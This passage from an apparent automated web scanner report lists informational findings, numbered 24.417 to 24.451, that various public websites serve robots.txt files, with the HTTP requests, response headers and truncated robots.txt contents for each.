Host:   http://www.hulu.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hulu.com

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/plain
Last-Modified: Thu, 10 Mar 2011 07:12:48 GMT
Date: Sat, 02 Apr 2011 12:37:51 GMT
Content-Length: 1194
Connection: close

User-agent: blinkx
Disallow: /

User-agent: blinkx_ff_spider
Disallow: /

User-agent: *
Disallow: /account/authenticate
Disallow: /activities/
Disallow: /channels/
Disallow: /discussions/search
Disall
...[SNIP]...

24.417. http://www.ichotelsgroup.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ichotelsgroup.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ichotelsgroup.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Wed, 23 Feb 2011 01:21:38 GMT
ETag: "fa7b-ec4-4d646122"
Accept-Ranges: bytes
Content-Length: 3780
Expires: Sat, 02 Apr 2011 13:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:37:25 GMT
Connection: close
Set-Cookie: TLTSID=588F60E05D2E105D0001ED27673734ED; Path=/; Domain=.ichotelsgroup.com
Set-Cookie: TLTUID=588F60E05D2E105D0001ED27673734ED; Path=/; Domain=.ichotelsgroup.com; expires=Sat, 02-04-2021 13:37:25 GMT

User-agent: OmniExplorer_Bot
Disallow: /

User-agent: NaverBot-1.0
Disallow: /

User-agent: NaverBot
Disallow: /

User-agent: Mizzu Labs 2.2
Disallow: /

User-agent: *
Disallow: /css/
Disallow: /journ
...[SNIP]...

24.418. http://www.icontact.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.icontact.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.icontact.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:52 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.12-0.dotdeb.1 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Wed, 02 Mar 2011 22:20:18 GMT
ETag: "199-49d87515c6c80"
Accept-Ranges: bytes
Content-Length: 409
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# File to control which pages friendly web spiders index.

# This file applies to all spiders
User-agent: *
Disallow: /lp/
Disallow: /001/
Disallow: /010/
Disallow: /012/
Disallow: /a.pl
Disallow: /re
...[SNIP]...

24.419. http://www.identityguard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.identityguard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.identityguard.com

Response

HTTP/1.1 200 OK
Content-Length: 3573
Content-Type: text/plain
Last-Modified: Thu, 17 Feb 2011 15:55:23 GMT
Accept-Ranges: bytes
ETag: "f6711a16bbcecb1:1fff"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:27:04 GMT
Connection: close

...# robots.txt file for http://www.identityguard.com
User-agent: *
Disallow: /App_Code/
Disallow: /aspnet_client/
Disallow: /AssetManagement/
Disallow: /assets/
Disallow: /bin/
Disallow: /css/
...[SNIP]...

24.420. http://www.ikea.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ikea.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ikea.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 17 Nov 2010 07:30:29 GMT
ETag: "802-199-a5ca8f40"
Accept-Ranges: bytes
Content-Length: 409
Content-Type: text/plain; charset=utf-8
Cache-Control: public, max-age=1800
Date: Sat, 02 Apr 2011 13:41:59 GMT
Connection: close

User-agent: *
Disallow: /ms/en_SE/
Disallow: /webapp/wcs/stores/servlet/IkeamsSearch
Disallow: /be/fr/preindex.html
Disallow: /be/nl/preindex.html
Disallow: /webapp/wcs/stores/servlet/InterestIt
...[SNIP]...

24.421. http://www.ilike.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ilike.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ilike.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
P3P: policyref="http://www.ilike.com/p3p.xml", CP="CAO CUR ADM IVAo IVDo CONo OTPo OUR IND UNI NAV ONL INT PRE"
Date: Sat, 02 Apr 2011 12:28:26 GMT
X-App: lv-app82-170:80
Last-Modified: Mon, 03 Jan 2011 23:38:17 GMT
Content-Length: 135
Connection: Keep-Alive

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
User-agent: Rapleafbot
Disallow: /

24.422. http://www.iloveindia.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iloveindia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iloveindia.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:58 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
Last-Modified: Tue, 24 Nov 2009 14:42:53 GMT
ETag: "681f81-5c-f4fc5540"
Accept-Ranges: bytes
Content-Length: 92
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /adnetwork/
Disallow: /directory/
Disallow: /hotelsinindia/query/



24.423. http://www.imageshack.us/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imageshack.us
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imageshack.us

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sat, 02 Apr 2011 13:31:42 GMT
Content-Type: text/plain
Content-Length: 116
Last-Modified: Tue, 30 Nov 2010 23:31:04 GMT
Connection: close
Set-Cookie: is_uuid=4f536d4396c041c4a079db878dc9e2ea; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000
Accept-Ranges: bytes

User-agent: *
Disallow: /images/tag/
Disallow: /search.php
Sitemap: http://stream.imageshack.us/image_sitemap.xml

24.424. http://www.imdb.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imdb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imdb.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:57 GMT
Server: Server
Last-Modified: Fri, 01 Apr 2011 05:36:07 GMT
ETag: "1512-4d956447"
Accept-Ranges: bytes
Content-Length: 5394
Cneonction: close
Content-Type: text/plain
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Connection: close

# robots.txt for IMDb properties
# [ images/legacy/robots.txt ]
#
User-agent: Slurp
Crawl-delay: 0.2
Disallow: /tvschedule
Disallow: /ActorSearch
Disallow: /ActressSearch
Disallow: /AddRecommendation

...[SNIP]...

24.425. http://www.imesh.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imesh.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imesh.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sun, 06 Mar 2011 13:23:25 GMT
ETag: "17-48ae8d40"
Accept-Ranges: bytes
Content-Length: 23
X-ML: W1
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:33:15 GMT
Connection: close

User-Agent: *
Allow: /

24.426. http://www.in.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.in.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:27 GMT
Server: Apache
Last-Modified: Thu, 17 Feb 2011 22:40:56 GMT
ETag: "ae80d3-d2-49c821736ee00"
Accept-Ranges: bytes
Content-Length: 210
Connection: close
Content-Type: text/plain
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1865746442.20480.0000; expires=Sat, 02-Apr-2011 13:40:27 GMT; path=/

# robots.txt for http://www.IN.gov/


User-agent: *

Disallow: /serv/

Disallow: /apps/

Disallow: /cgi-bin/

Disallow: /isdh/drafts_local/

Disallow: /demand

Disallow: /search

Disallow: /
...[SNIP]...

24.427. http://www.inbox.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inbox.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.inbox.com

Response

HTTP/1.1 200 OK
Content-Length: 431
Content-Type: text/plain
Last-Modified: Thu, 03 Feb 2011 08:11:31 GMT
Accept-Ranges: bytes
ETag: "fee22f779c3cb1:33ef"
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:33:24 GMT
Connection: close

User-Agent: *
Disallow: /_portal/

User-Agent: msnbot
Crawl-delay: 1
Disallow: /xfb_redir.aspx
Disallow: /_portal/

User-Agent: msnbot-newsblogs
Disallow: /xfb_redir.aspx
Disallow: /_portal/
...[SNIP]...

24.428. http://www.inc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.inc.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:47 GMT
Server: VoxCAST
Last-Modified: Mon, 15 Nov 2010 16:55:00 GMT
ETag: "98f487-33f-4951a4cfa4100"
Accept-Ranges: bytes
Content-Length: 831
Cache-Control: max-age=259200
Expires: Sat, 02 Apr 2011 14:52:46 GMT
Age: 257220
X-Cache: HIT from VoxCAST
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /apps
Disallow: /discussions
Disallow: /cgi-bin
Disallow: /search
Disallow: /sendit
Disallow: /soundoff
Disallow: /resources/inc500.5172005
Disallow: /resources/inc500.20050819
...[SNIP]...

24.429. http://www.indeed.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indeed.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.indeed.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:39 GMT
Server: Apache
Last-Modified: Tue, 16 Nov 2010 23:08:23 GMT
ETag: "6f0001-ba2-49533a22447c0"
Accept-Ranges: bytes
Content-Length: 2978
Vary: User-Agent
Keep-Alive: timeout=30, max=30000
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_vt_jbe=ffffffffad2ce1a345525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:24:39 GMT;path=/;httponly

User-agent: *
Allow: /
Disallow: /advanced_search?
Disallow: /rss
Disallow: /g/
Disallow: /r/
Disallow: /rc/
Disallow: /pagead/
Disallow: /ads/
Disallow: /rdr/
Disallow: /my/
Disallow: /rpc/
Disallow:
...[SNIP]...

24.430. http://www.indiatimes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indiatimes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.indiatimes.com

Response

HTTP/1.0 200 OK
Content-Length: 68
Content-Type: text/plain
Last-Modified: Mon, 31 Jan 2011 06:25:19 GMT
Accept-Ranges: bytes
ETag: "cddfda1fc1cb1:5cf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=128715
Date: Sat, 02 Apr 2011 14:02:49 GMT
Connection: close

User-agent: *
Disallow: /default1.cms
Disallow: /default.cms



24.431. http://www.info.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.info.com

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.218CKMLM; path=/
Date: Sat, 02 Apr 2011 13:39:24 GMT
Server: Apache
Last-Modified: Mon, 12 May 2008 11:16:27 GMT
ETag: "64fd1b-18-44d06adbf98c0"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow:

24.432. http://www.infoplease.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infoplease.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.infoplease.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:24 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1301751444510777; path=/; expires=Sun, 01-Apr-12 13:37:24 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:37:24 GMT
Content-Length: 450
Content-Type: text/plain;charset=iso-8859-1

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /dynaweb/
Disallow: /dw/
Disallow: /oasis/
Disallow: /oasisi-e.php
Disallow: /oasisi-i.php
Disallow: /oasisi-j.php
Disallow: /oasis
...[SNIP]...

24.433. http://www.infowars.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infowars.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.infowars.com

Response

HTTP/1.0 200 OK
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=7200, public
Content-Type: text/plain; charset=UTF-8
Age: 11973
Date: Sat, 02 Apr 2011 13:42:33 GMT
Last-Modified: Mon, 29 Nov 2010 04:13:43 GMT
Expires: Sat, 02 Apr 2011 14:23:00 GMT
Content-Length: 450
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content
Disallow: /tag
Disallow: /author
Disallow: /wget/
Disallow: /httpd/

User-agent: Mediapartn
...[SNIP]...

24.434. http://www.ingdirect.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ingdirect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ingdirect.com

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Fri, 04 Mar 2011 13:19:36 GMT
Server: Microsoft-IIS/7.0
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:43:45 GMT
Content-Length: 607
ETag: "pvd6ef711ae3057fa3a07bf5bd95a791c5"
Expires: Sat, 02 Apr 2011 13:43:55 GMT
Cache-Control: public, s-maxage=0, max-age=10
X-PvInfo: [S10203.C6966.A38321.RA0.G9647.UE1B49C4B].[OT/plaintext.OG/documents]
Accept-Ranges: bytes

User-agent: *
Disallow: *.ico
Disallow: *.inc
Disallow: /bsa_box
Disallow: /bsa_chart
Disallow: /compare-mortgages
Disallow: /eo-high-interest-checking
Disallow: /fakefees
Disallow: /google
D
...[SNIP]...

24.435. http://www.insiderpages.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.insiderpages.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.insiderpages.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:08:30 GMT
Server: Apache
Last-Modified: Tue, 15 Mar 2011 02:34:32 GMT
Accept-Ranges: bytes
Content-Length: 706
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 14:08:30 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /signup
Disallow: /recs/
Disallow: /signon
Disallow: /signon/forgot_password
Disallow: /signon/change_password
Disallow: /review/write/
Disallow: /review/flag/
Disallow: /revie
...[SNIP]...

24.436. http://www.instructables.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.instructables.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.instructables.com

Response

HTTP/1.1 200 OK
Server: Resin/3.0.28
P3P: IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA
ETag: "89fvrAVqdMX"
Last-Modified: Tue, 22 Feb 2011 23:27:56 GMT
Content-Type: text/plain
Content-Length: 1166
X-Cacheable: YES - 30 minutes
Cache-Control: no-cache
Date: Sat, 02 Apr 2011 13:36:03 GMT
X-Varnish: 793449977 793331233
Age: 1101
Via: 1.1 varnish
X-Cache-Svr: squid04.instructables.com
X-Cache: HIT
X-Cache-Hits: 23
Connection: close

hi from cloude
User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /include/
Disallow: /account/
Disallow: /you/
Disallow: /admin/
Disallow: /patch/
Disallow: /pages/
...[SNIP]...

24.437. http://www.intel.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.intel.com

Response

HTTP/1.0 200 OK
Content-Length: 481
Content-Type: text/plain
Last-Modified: Mon, 28 Mar 2011 23:31:02 GMT
Accept-Ranges: bytes
ETag: "1ed26633a0edcb1:4476"
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Date: Sat, 02 Apr 2011 14:04:59 GMT
Connection: close

# robots.txt exclusion for www.intel.com
#

# for all agents, keep them out of the /cgi directory

User-agent: *
Disallow: /cgi
Disallow: /iaweb/
Disallow: /cpc/vision/
Disallow: /intel/june2
...[SNIP]...

24.438. http://www.intellicast.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intellicast.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.intellicast.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=259200
Content-Length: 1464
Content-Type: text/plain
Last-Modified: Thu, 24 Apr 2008 13:28:09 GMT
Accept-Ranges: bytes
ETag: "42664c9fa6c81:569"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:06:22 GMT
Connection: close

...User-agent: *
Sitemap: http://www.intellicast.com/sitemap.xml
Sitemap: http://www.intellicast.com/sitemap_conus_weather.xml
Sitemap: http://www.intellciast.com/sitemap_global_weather.xml
Sitema
...[SNIP]...

24.439. http://www.intuit.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intuit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.intuit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:42 GMT
Server: Apache
Last-Modified: Mon, 28 Mar 2011 05:17:42 GMT
Accept-Ranges: bytes
Content-Length: 2779
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 13:39:42 GMT
Vary: Accept-Encoding
P3P: policyref="http://smallbusiness.intuit.com/small-business/privacy/index.jsp",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/plain

# The method used to exclude robots from a server is to create a file on the server
# which specifies an access policy for robots. This file must be accessible via
# HTTP on the local URL "/robots.t
...[SNIP]...

24.440. http://www.iobit.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iobit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iobit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:09:12 GMT
Server: Apache
Last-Modified: Mon, 08 Mar 2010 07:39:20 GMT
Accept-Ranges: bytes
Content-Length: 356
Connection: close
Content-Type: text/plain

# Robots.txt file from http://www.iobit.com
#
# All robots will spider the domain

User-agent: *
Disallow: /update_for_registered_customers.htm
Disallow: /thankTellothers.php
Disallow: /thankFeedback.
...[SNIP]...

24.441. http://www.ioffer.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ioffer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ioffer.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:05 GMT
Server: PWS/1.7.1.5
X-Px: nc jfk-agg-n68 ( sjc-ag1-n2), nc sjc-ag1-n2 ( origin)
Cache-Control: private
Content-Type: text/plain
Last-Modified: Sat, 25 Apr 2009 21:36:20 GMT
Vary: Accept-Encoding
Connection: close
Set-Cookie: iOfferID=CgALKk2XJkVR2WeZAxrHAg==; expires=Tue, 30-Mar-21 13:36:05 GMT; domain=ioffer.com; path=/

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

# NOTICE:
#
# All material on this server is Copyright (c) 1998-2006 iOffer Corp.
#
# A
...[SNIP]...

24.442. http://www.irs.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.irs.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.irs.gov

Response

HTTP/1.0 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
P3P: policyref='/w3c/p3p.xml',CP='NON DSP COR CURa ADMa DEVa PSAa OUR DEL BUS STA'
Content-Type: text/plain
Last-Modified: Fri, 11 Feb 2011 07:20:27 GMT
Content-Length: 559
ETag: "22f-4d54e33b"
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:35:31 GMT
Connection: close

User-agent: *
Disallow: /app/cgi-bin
Disallow: /app/comments
Disallow: /app/eprovidersearch
Disallow: /app/officeLocator
Disallow: /app/pickProvider
Disallow: /app/survey
Disallow: /app2/cgi-bin1
Disa
...[SNIP]...

24.443. http://www.issuu.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.issuu.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.issuu.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:43:54 GMT
Content-Type: text/plain
Content-Length: 306
Last-Modified: Fri, 18 Mar 2011 03:14:15 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /home/
Disallow: /mylibrary
Disallow: /user/settings
Disallow: /user/upload
Disallow: /sections
Disallow: /signup
Disallow: /business/signup
Disallow: /embed/guide
Disallow: /p
...[SNIP]...

24.444. http://www.istockphoto.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.istockphoto.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.istockphoto.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 17 Feb 2011 22:03:53 GMT
ETag: "2b312b-41a-49c8192b6a440"
X-Cnection: close
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:16:11 GMT
Content-Length: 1050
Connection: close

User-agent: *
Disallow: /css/
Disallow: /static/css/
Disallow: /js/
Disallow: /static/js/
Disallow: /images/
Disallow: /static/images/

Allow: /webservices/feeds
Disallow: /we
...[SNIP]...

24.445. http://www.iwin.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iwin.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iwin.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 07:58:21 GMT
ETag: W/"439-1296818118000"
Last-Modified: Fri, 04 Feb 2011 11:15:18 GMT
Content-Type: text/plain
Server: Apache
Content-Length: 439
Date: Sat, 02 Apr 2011 13:42:08 GMT
X-Varnish: 931872689 930451207
Age: 20627
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /ec/
Disallow: /Login.do
Disallow: /standardRegister.do
Disallow: /Register.do
Disallow: /*m=25
Disallow: /*init=
Disallow: /downloadSearch.do
Disallow: /index
Disallo
...[SNIP]...

24.446. http://www.jcpenney.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jcpenney.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jcpenney.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "98b0fd3b8465fae6fe0f3717d7de30ea:1292463674"
Last-Modified: Thu, 16 Dec 2010 01:40:42 GMT
Accept-Ranges: bytes
Content-Length: 101403
Content-Type: text/plain
Date: Sat, 02 Apr 2011 12:44:13 GMT
Connection: close

# updated 2010-12-15

User-agent: *
Disallow: /17offer/
Disallow: /274swim/
Disallow: /286dockers/
Disallow: /298apparel/
Disallow: /298team/
Disallow: /308levis/
Disallow: /429.2test/
Disal
...[SNIP]...

24.447. http://www.jcwhitney.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jcwhitney.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jcwhitney.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 26 Jan 2011 07:14:40 GMT
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:52:00 GMT
Content-Length: 1254
Connection: close

User-agent: *

Disallow: /*sku=*
Disallow: /*shopid=*
Disallow: /*nval=*
Disallow: /*Ntt=*
Disallow: /*Ntk=*
Disallow: /*Ntx=*
Disallow: /*Dx=*
Disallow: /*aid=*
Disallow: /*tid=*
Disallow:
...[SNIP]...

24.448. http://www.jihadwatch.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jihadwatch.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jihadwatch.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:43 GMT
Server: Apache/2.2.14
Last-Modified: Sat, 19 Sep 2009 21:30:40 GMT
ETag: "f248d-46-473f4f5ce6000"
Accept-Ranges: bytes
Content-Length: 70
Connection: close
Content-Type: text/plain

User-agent: *
Sitemap: http://www.jihadwatch.org/sitemap.xml
Allow: /

24.449. http://www.joann.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joann.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.joann.com

Response

HTTP/1.0 200 OK
Set-Cookie: ACE_COOKIE=R3413708039; path=/; expires=Sun, 03-Apr-2011 13:43:27 GMT
Date: Sat, 02 Apr 2011 13:42:37 GMT
Set-Cookie: ACE_COOKIE=R1260875148; path=/; expires=Sun, 03-Apr-2011 13:43:27 GMT
Server: Apache
Last-Modified: Fri, 09 Jul 2010 14:27:06 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 327

User-agent: *

Sitemap: http://www.joann.com/sitemap-index.xml

Disallow: /images/
Disallow: /joann/search/
Disallow: /joann/cart/
Disallow: /joann/crypto/
Disallow: /joann/email/
Disall
...[SNIP]...

24.450. http://www.job.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.job.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.job.com

Response

HTTP/1.1 200 OK
Content-Length: 956
Content-Type: text/plain
Content-Location: http://www.job.com/robots.txt
Last-Modified: Thu, 07 Jan 2010 16:53:06 GMT
Accept-Ranges: bytes
ETag: "22da4ce2b98fca1:10c6"
Server: Microsoft-IIS/6.0
P3P: CP="DSP CAO CUR ADM DEV TAI PSA PSD IVDi IVAi CONi OUR UNRi BUS NAV COM INT ONL PHY DEM UNI"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:38:07 GMT
Connection: close

# robots.txt 4 job.com /// admin @ job.com
# /// I_LOVE_SPAM@127.0.0.1 /// bite this spammers ///
User-agent: *
#.....Disallow: 21*
## ////////////// ##
## May 27, 2005 ##
## ////////////// ##
...[SNIP]...

24.451. http://www.jobsonline.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jobsonline.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jobsonline.net

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:45:42 GMT
Server: Apache/2.2.11 (Fedora)
Last-Modified: Tue, 17 Mar 2009 16:49:45 GMT
ETag: "1178052-170-465535aafbc40"
